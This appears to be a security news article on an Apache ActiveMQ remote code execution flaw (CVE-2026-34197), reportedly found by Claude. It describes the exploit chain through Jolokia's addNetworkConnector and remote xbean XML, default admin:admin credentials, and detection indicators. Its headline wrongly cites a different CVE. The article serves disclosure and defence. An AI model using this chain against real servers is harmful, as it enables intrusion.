Critical RCE Flaw CVE-2023-46604 in Apache ActiveMQ Exposes Servers
Key Takeaways A critical remote code execution (RCE) vulnerability, CVE-2026-34197, has been discovered in Apache ActiveMQ Classic. The flaw impacts versions 5.x, 6.0.0 through 6.1.1, and allows...
Key Takeaways
- A critical remote code execution (RCE) vulnerability, CVE-2026-34197, has been discovered in Apache ActiveMQ Classic.
- The flaw impacts versions 5.x, 6.0.0 through 6.1.1, and allows arbitrary code execution, potentially without authentication in some cases.
- This vulnerability was notably identified by Anthropic’s Claude AI model in under 10 minutes, highlighting AI’s growing role in cybersecurity research.
- A patch is available in ActiveMQ Classic versions 5.19.4 and 6.2.3, and immediate updates are strongly recommended.
A significant remote code execution (RCE) vulnerability, present in Apache ActiveMQ Classic for over a decade, has finally come to light. This discovery is particularly notable as it was identified not by human researchers, but by Anthropic’s Claude AI model, which pinpointed the flaw in a mere ten minutes.
Table Of Content
Designated as CVE-2026-34197, this vulnerability stems from improper input validation and code injection within the Jolokia JMX-HTTP bridge of Apache ActiveMQ Classic. The affected component is exposed via the web console at /api/jolokia/ on port 8161.
Technical Breakdown of the Flaw
The vulnerability enables an authenticated attacker to execute the addNetworkConnector(String) management operation on the broker’s MBean. By supplying a specially crafted VM transport URI containing an attacker-controlled brokerConfig=xbean:http:// parameter, a malicious actor can trigger the exploit.
Upon processing this input, ActiveMQ’s VM transport layer initiates an embedded broker on the fly. This occurs through a call to BrokerFactory.createBroker(), utilizing the URL provided by the attacker.
Subsequently, the xbean: scheme passes this URL to Spring’s ResourceXmlApplicationContext. This component then instantiates all bean definitions found in the remote XML file. This critical step allows for arbitrary operating system command execution by leveraging Spring’s MethodInvokingFactoryBean to invoke Runtime.getRuntime().exec().
The root cause of this vulnerability can be traced back to a remediation effort for CVE-2022-41678. In that fix, Apache introduced a broad Jolokia allow rule for all operations on ActiveMQ’s own MBeans (org.apache.activemq:*) to maintain web console functionality. This decision inadvertently exposed every management operation, including addNetworkConnector, as an attack vector through Jolokia’s REST API.
Authentication and Unauthenticated Attack Paths
While CVE-2026-34197 typically requires valid authentication credentials for exploitation in most deployments, the widespread use of default credentials (admin:admin) across enterprise environments significantly lowers the barrier for attackers.
More critically, organizations operating ActiveMQ versions 6.0.0 through 6.1.1 face a fully unauthenticated RCE path. A separate vulnerability, CVE-2024-32114, inadvertently removed authentication constraints from the /api/* path in these specific versions. This means the Jolokia endpoint in these builds requires no credentials, effectively transforming CVE-2026-34197 into a no-authentication RCE for those deployments.
ActiveMQ has a documented history of being targeted in the wild. Both CVE-2016-3088 (an authenticated RCE via the web console) and CVE-2023-46604 (an unauthenticated RCE via the broker port) are listed on CISA’s Known Exploited Vulnerabilities (KEV) catalog, underscoring the product’s appeal to threat actors.
AI’s Role in Discovery
Researchers at Horizon3.ai credited Anthropic’s Claude AI for identifying this flaw during an AI-assisted source code review. By providing Claude with a focused vulnerability-hunting prompt and a live target for validation, the AI successfully traced the complex, multi-component attack chain involving Jolokia, JMX, network connectors, and VM transports in approximately 10 minutes.
Analysts highlighted that mapping such a complex chain would likely have taken a skilled human researcher an entire week to accomplish manually. This achievement underscores how AI models are significantly lowering the entry barrier for advanced vulnerability research.
What You Should Do
- Update Immediately: Patch to ActiveMQ Classic versions 5.19.4 or 6.2.3 without delay. These versions remove the ability for
addNetworkConnectorto registervm://transports via the Jolokia API entirely. - Monitor Logs: Scrutinize ActiveMQ broker logs for entries containing
vm://URIs withbrokerConfig=xbean:http, POST requests to/api/jolokia/includingaddNetworkConnectorin the body, and any unexpected outbound HTTP connections originating from the ActiveMQ process. - Detect Abnormal Processes: Watch for unusual child processes spawned by the ActiveMQ JVM, which could indicate successful exploitation.
- Audit Credentials: Conduct an immediate audit of all ActiveMQ instances to identify and eliminate the use of default credentials (e.g.,
admin:admin). Implement strong, unique passwords for all accounts.
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.



No Comment! Be the first one.